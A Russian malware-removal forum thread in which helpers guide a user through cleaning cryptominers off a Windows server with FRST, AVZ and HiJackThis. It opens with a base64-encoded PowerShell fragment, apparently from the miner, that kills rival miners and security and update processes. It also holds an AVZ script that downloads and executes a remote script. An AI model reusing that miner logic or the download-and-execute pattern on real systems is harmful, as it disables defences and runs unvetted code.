ByAFMAaABlAGwAbAAgAHwAIABTAG8AcgB0ACAAQwBQAFUAIAAtAEQAZQBzAGMAZQBuAGQAaQBuAGcAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBJAGQAfQANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAATgBlAHQAUwB0AGEAdAAgAC0AYQBuAG8AcAAgAFQAQwBQAA0ACgAJAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApAA0ACgAJAHsADQAKAAkACQBmAG8AcgBlAGEAYwBoACAAKAAkAHQAIABpAG4AIAAkAHQAYwBwAGMAbwBuAG4AKQANAAoACQAJAHsADQAKAAkACQAJACQAbABpAG4AZQAgAD0AIAAkAHQALgBzAHAAbABpAHQAKAAnACAAJwApAHwAIAA/AHsAJABfAH0ADQAKAAkACQAJAGkAZgAgACgAJABsAGkAbgBlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsAIABjAG8AbgB0AGkAbgB1AGUAIAB9AA0ACgAJAAkACQBpAGYAIAAoACgAJABwAHMAaQBkAHMAWwAwAF0AIAAtAGUAcQAgACQAbABpAG4AZQBbAC0AMQBdACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAMAAgACIAKQAgAC0AbwByACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADQANAAzACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAyADIAMgAyACIAKQAgAC0AbwByACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADMAMwAzADMAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA1ADUANQA1ACIAKQAgAC0AbwByACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADYANgA2ADYAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA4ADgAOAA4ACIAKQAgAC0AbwByACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADkAOQA5ADkAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADEANAA0ADQANAAiACkAIAAtAG8AcgAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA0ADUANQA2ADAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQApACkADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJABlAHYAaQBkACAAPQAgACQAbABpAG4AZQBbAC0AMQBdAA0ACgAJAAkACQAJAGkAZgAgACgAKAAkAGUAdgBpAGQAIAAtAGUAcQAgACQAUABJAGQAKQAgAC0AbwByACAAKAAkAGUAdgBpAGQAIAAtAGUAcQAgACQAbQBQAEkAZAApACAALQBvAHIAIAAoACQAZQB2AGkAZAAgAC0AZQBxACAAJABuAFAASQBkACkAKQAgAHsAIABjAG8AbgB0AGkAbgB1AGUAIAB9AA0ACgAJAAkACQAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAFsAaQBdACAATQBpAG4AZQByACAAUABJAGQAOgAgACQAZQB2AGkAZAAiAA0ACgAJAAkACQAJAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0ASQBkACAAJABlAHYAaQBkACAAfAAgAFMAdABvAHAALQBQAHIAbwBjAGUAcwBzACAALQBGAG8AcgBjAGUADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKAAkAewANAAoACQAJACQAbABpAG4AZQAgAD0AIAAkAHQALgBzAHAAbABpAHQAKAAnACAAJwApAHwAIAA/AHsAJABfAH0ADQAKAAkACQBpAGYAIAAoACEAKAAkAGwAaQBuAGUAIAAtAGkAcwAgAFsAYQByAHIAYQB5AF0AKQApACAAewAgAGMAbwBuAHQAaQBuAHUAZQAgAH0ADQAKAAkACQBpAGYAIAAoACgAJABsAGkAbgBlAFsALQAzAF0AIAAtAG4AZQAgACQAbgB1AGwAbAApACAALQBhAG4AZAAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIARQBTAFQAQQBCAEwASQBTAEgARQBEACIAKQAgAC0AYQBuAGQAIAAoACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADEAMQAxADEAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAyADIAMgAyACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMwAzADMAMwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADQANAA0ADQAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA1ADUANQA1ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA2ADYANgAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADcANwA3ADcAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA4ADgAOAA4ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOQA5ADkAOQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADEANAA0ADMAMwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADEANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADQANQA1ADYAMAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADYANQAzADMAMwAiACkAIAAgACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA1ADUAMwAzADUAIgApACkAKQANAAoACQAJAHsADQAKAAkACQAJACQAZQB2AGkAZAAgAD0AIAAkAGwAaQBuAGUAWwAtADEAXQANAAoACQAJAAkAaQBmACAAKAAoACQAZQB2AGkAZAAgAC0AZQBxACAAJABQAEkAZAApACAALQBvAHIAIAAoACQAZQB2AGkAZAAgAC0AZQBxACAAJABtAFAASQBkACkAIAAtAG8AcgAgACgAJABlAHYAaQBkACAALQBlAHEAIAAkAG4AUABJAGQAKQApACAAewAgAGMAbwBuAHQAaQBuAHUAZQAgAH0ADQAKAAkACQAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAFsAaQBdACAATQBpAG4AZQByACAAUABJAGQAOgAgACQAZQB2AGkAZAAiAA0ACgAJAAkACQBHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEkAZAAgACQAZQB2AGkAZAAgAHwAIABTAHQAbwBwAC0AUAByAG8AYwBlAHMAcwAgAC0ARgBvAHIAYwBlAA0ACgAJAAkAfQANAAoACQB9AA0ACgANAAoACQAkAE0AaQBuAGUAcgAgAD0AIAAiAFMAQwAiACwAIAAiAG0AcwBpAG4AZgBvACIALAAgACIAWABNAFIAKgAiACwAIgB4AG0AcgBpAGcAKgAiACwAIgBtAGkAbgBlAHIAZAAiACwAIgBNAGkAbgBlAHIARwBhAHQAZQAiACwAIgBDAGEAcgBiAG8AbgAiACwAIgB5AGEAbQBtADEAIgAsACIAdQBwAGcAZQBhAGQAZQAiACwAIgBhAHUAdABvAC0AdQBwAGcAZQBhAGQAZQAiACwAJwBzAHYAcwBoAG8AcwB0ACcALAAiAFMAeQBzAHQAZQBtAEkASQBTACIALAAiAFMAeQBzAHQAZQBtAEkASQBTAFMAZQBjACIALAAiAGEAdgBhAHMAdAAqACIALAAnAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUAcgAqACcALAAiAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByACoAIgAsACIAVwBpAG4AZABvAHcAcwBTAGUAcgB2AGkAYwBlACoAIgAsACIAdQBwAGQAYQB0AGUAIgAsACAAIgBjAGEAcgBzAHMAIgAsACIAcwBlAHIAdgBpAGMAZQAiACwAIgBjAHMAcgBzAGMAIgAsACIAYwBhAHIAYQAiACwAIgBqAGEAdgBhAHUAcABkACIALAAiAGcAeABkAHIAdgAiACwAIAAiAGwAcwBtAG8AcwBlAGUAIgAsACAAIgBzAGUAYwB1AGEAbQBzACIALAAiAFMAUQBMAEUAWABQAFIARQBTAFMAXwBYADYANABfADgANgAiACwAIAAiAEMAYQBsAGwAaQBnAHIAYQBwACIALAAiAFMAcQBsAGMAZQBxAHAAIgAsACIAUwBlAHQAdABpAG4AZwAiACwAIgBVAG4AaQBuAHMAdABhACIALAAgACIAVABlAHIAbQBzAC4ARQBYAEUAIgANAAoACQBmAG8AcgBlAGEAYwBoACAAKAAkAG0AIABpAG4AIAAkAE0AaQBuAGUAcgApAA0ACgAJAHsADQAKAAkACQBHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIAAkAG0AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIAB8ACAAUwB0AG8AcAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAbwByAGMAZQANAAoACQB9AA0ACgB9AA0ACgANAAoATQBhAGkAbgA=[/code]
Скачайте [URL="http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/"]Farbar Recovery Scan Tool[/URL] и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
[url="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ[/url] при наличии доступа в интернет:[CODE]var
LogPath : string;
ScriptPath : string;
begin
LogPath := GetAVZDirectory + 'log\avz_log.txt';
if FileExists(LogPath) Then DeleteFile(LogPath);
ScriptPath := GetAVZDirectory +'ScanVuln.txt';
if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
exit;
end;
end;
if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.[/CODE]
После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt, прикрепите его к сообщению.
Farbar Recovery Scan Tool
у меня ОС Windows Server 2008
там нет для серверных версии
А пробовали запускать? Там разрядность важна.
1. Пофиксить не решился.
Предлагалось удалить как явно нужное так и мне не вполне ведомое
2. Отчеты Farbar Recovery Scan Tool прилагаю (не пойму только как это сделать).
3. Скрипт AVZ ничего не нашел
[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]
[QUOTE=bayrak59;1482570]1. Пофиксить не решился.
Предлагалось удалить как явно нужное так и мне не вполне ведомое
2. Отчеты Farbar Recovery Scan Tool прилагаю (не пойму только как это сделать).
3. Скрипт AVZ ничего не нашел[/QUOTE]
Загрузил таки отчеты
1. А почему? Там у Вас майнер через кодированный скрипт в PowerShell запускается. Фиксите и делайте новый лог Autologger.
[QUOTE=Vvvyg;1482604]1. А почему? Там у Вас майнер через кодированный скрипт в PowerShell запускается. Фиксите и делайте новый лог Autologger.[/QUOTE]
Сделал отчет.
Посмотрите, пожалуйста, что там нужно удалить.
Ровно те же рекомендации, что и в сообщении #3.
[QUOTE=Vvvyg;1482732]Ровно те же рекомендации, что и в сообщении #3.[/QUOTE]
Извините мою непонятливость.
Я лишь слегка продвинутый пользователь.
Но [COLOR=#141414][FONT="]HiJackThis Fork [/FONT][/COLOR] предлагает для удаления явно нужные вещи.
Видимо, нужно выбрать, но что?
Или пофиксить всё, что будет найдено?
В сообщении #3 не конкретизирован этот момент.
И ещё.
Не понял, что за код в сообщении #3?
Этот :O25 - WMI Event: [PowerShell Event Log Consumer] PowerShell Event Log Filter - ...............
С ним что-то делать?
[b]bayrak59[/b], в инструкциях как правило некоторые слова или фразы "кликабельны". То есть, нужно нажать и откроется подробная инструкция о том, как "пофиксить" или выполнить скрипт.
Сейчас Вам следует во время [url=http://virusinfo.info/showthread.php?t=4491]фикса в HiJackThis[/url] отметить только указанную одну строку.
На всякий случай вот ссылка: [url]http://virusinfo.info/showthread.php?t=4491[/url]
Затем [url=http://virusinfo.info/showthread.php?t=7239]выполнить скрипт в AVZ[/url] и прикрепить файл [B]avz_log.txt[/B].
Еще ссылка: [url]http://virusinfo.info/showthread.php?t=7239[/url]
После этого соберите с помощью Autologger еще раз новый CollectionLog (также, как делали в начале) и тоже прикрепите к следующему сообщению.
[QUOTE=Sandor;1482774][B]bayrak59[/B], в инструкциях как правило некоторые слова или фразы "кликабельны". То есть, нужно нажать и откроется подробная инструкция о том, как "пофиксить" или выполнить скрипт.
Сейчас Вам следует во время [URL="http://virusinfo.info/showthread.php?t=4491"]фикса в HiJackThis[/URL] отметить только указанную одну строку.
На всякий случай вот ссылка: [URL]http://virusinfo.info/showthread.php?t=4491[/URL]
Затем [URL="http://virusinfo.info/showthread.php?t=7239"]выполнить скрипт в AVZ[/URL] и прикрепить файл [B]avz_log.txt[/B].
Еще ссылка: [URL]http://virusinfo.info/showthread.php?t=7239[/URL]
После этого соберите с помощью Autologger еще раз новый CollectionLog (также, как делали в начале) и тоже прикрепите к следующему сообщению.[/QUOTE]
1. Пофиксил
2. Скрипт AVZ уязвимостей не выявил.
3. Отчеты прикрепил
[quote="Sandor;1482774"]новый [B]CollectionLog[/B] (также, как делали вначале) и тоже прикрепите к следующему сообщению.[/quote]
не сделали.
Такими темпами мы не вылечим ваш сервер никогда. Там уже новый майнер, в папке C:\webmfc. И в папке временных файлов 10050 вирусов. :>
Надо доступ к серверу ограничивать, нужен админ, который этим займётся, а не продвинутый пользователь, который неделю почти не мог фикс в HijackThis сделать... Удалять вирусы бесполезно, их тут же новых напихают.
Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:[CODE]() C:\webmfc\www\superminer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wscript.exe
Startup: C:\Users\Администратор\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SuperAbsenteeism.lnk [2018-06-06]
ShortcutTarget: SuperAbsenteeism.lnk -> C:\webmfc\www\superminer.exe ()
HKU\S-1-5-21-4012351981-3803896577-523002748-500\...\Run: [SuperMiner] => C:\webmfc\www\SUPERM~1.EXE [1863680 2018-06-05] ()
C:\webmfc
FirewallRules: [{A28135AB-B1E4-4B37-89B3-836F6F9893A1}] => (Allow) C:\Windows\Temp\lsass.eXe
FirewallRules: [{C77783B7-673F-4B76-AE91-9505F9C4BC61}] => (Allow) C:\Windows\Temp\lsass.eXe
FirewallRules: [{FA3EF290-B73E-4FFB-8999-E911326B9110}] => (Allow) C:\Windows\Temp\lsass.eXe
FirewallRules: [{48927487-A033-42A2-819A-6C9B95C39DFF}] => (Allow) C:\Windows\Temp\lsass.eXe
EmptyTemp:[/CODE]
и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. [U]При сохранении выберите кодировку [B]Юникод[/B]![/U]
Отключите до перезагрузки антивирус, [U]закройте все браузеры[/U], в FRST нажмите один раз [B]Fix[/B] и подождите. Программа создаст лог-файл ([B]Fixlog.txt[/B]). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
Затем сделайте новый лог Autologger.
[QUOTE=Sandor;1482828]не сделали.[/QUOTE]
Добавил.
Если фикс в FRST делали - прикрепите файл Fixlog.txt.
Пофиксите в HijackThis:[CODE]O4 - MSConfig\startupfolder: C:^Users^Администратор^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^SuperAbsenteeism.lnk [backup] => C:\webmfc\www\superminer.exe (2018/06/06)
O4 - MSConfig\startupreg: Open Server [command] = (no file) (2018/06/06)
O4 - MSConfig\startupreg: SuperMiner [command] = C:\webmfc\www\superminer.exe (HKCU) (2018/06/06)[/CODE]Что с проблемами?
[QUOTE=Vvvyg;1482911]Если фикс в FRST делали - прикрепите файл Fixlog.txt.
Пофиксите в HijackThis:[CODE]O4 - MSConfig\startupfolder: C:^Users^Администратор^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^SuperAbsenteeism.lnk [backup] => C:\webmfc\www\superminer.exe (2018/06/06)
O4 - MSConfig\startupreg: Open Server [command] = (no file) (2018/06/06)
O4 - MSConfig\startupreg: SuperMiner [command] = C:\webmfc\www\superminer.exe (HKCU) (2018/06/06)[/CODE]Что с проблемами?[/QUOTE]
Пофиксил.
После этого сделал FRST.txt
Прикрепил.
То, с чего началась эта тема ( lsass.eXe ), второй день не появляется.
Но и раньше бывало затишье. Почему-то вначале он лез стабильно по выходным.
Надо понаблюдать.
Зато нарисовалось еще такое : exp1orer.exe
Мы опять-таки боремся не с причинами, а с последствиями...
Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:[CODE]FirewallRules: [{A28135AB-B1E4-4B37-89B3-836F6F9893A1}] => (Allow) C:\Windows\Temp\lsass.eXe
FirewallRules: [{C77783B7-673F-4B76-AE91-9505F9C4BC61}] => (Allow) C:\Windows\Temp\lsass.eXe
FirewallRules: [{FA3EF290-B73E-4FFB-8999-E911326B9110}] => (Allow) C:\Windows\Temp\lsass.eXe
FirewallRules: [{48927487-A033-42A2-819A-6C9B95C39DFF}] => (Allow) C:\Windows\Temp\lsass.eXe
CMD: wmic qfe list
CMD: ipconfig /all
CMD: tracert -h 4 ya.ru[/CODE]
и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. [U]При сохранении выберите кодировку [B]Юникод[/B]![/U]
Отключите до перезагрузки антивирус, [U]закройте все браузеры[/U], в FRST нажмите один раз [B]Fix[/B] и подождите. Программа создаст лог-файл ([B]Fixlog.txt[/B]). Прикрепите его к своему следующему сообщению.
Посмотрите, Symantec Endpoint Protection в каком состоянии, включён, обновлён?
Смените пароль учётной записи Администратор на сложный. Пользователи на сервер заходят как, все под админской учёткой?
Что-то мой ответ пропал.
Повторю.
1. Сделал.
Файл прикрепил.
2. Symantec обновлен, включен.
Посторонними силами не отключался.
3. Пароль длинный, но простоват.
Сменил.
4. Пользователь - я один.
Захожу под админской учеткой
Попробуйте установит [URL="http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212"]этот хотфикс KB4012212[/URL].
Сделайте лог [url=https://virusinfo.info/showthread.php?t=218706&p=1480220&viewfull=1#post1480220]сканирования МВАМ.[/url]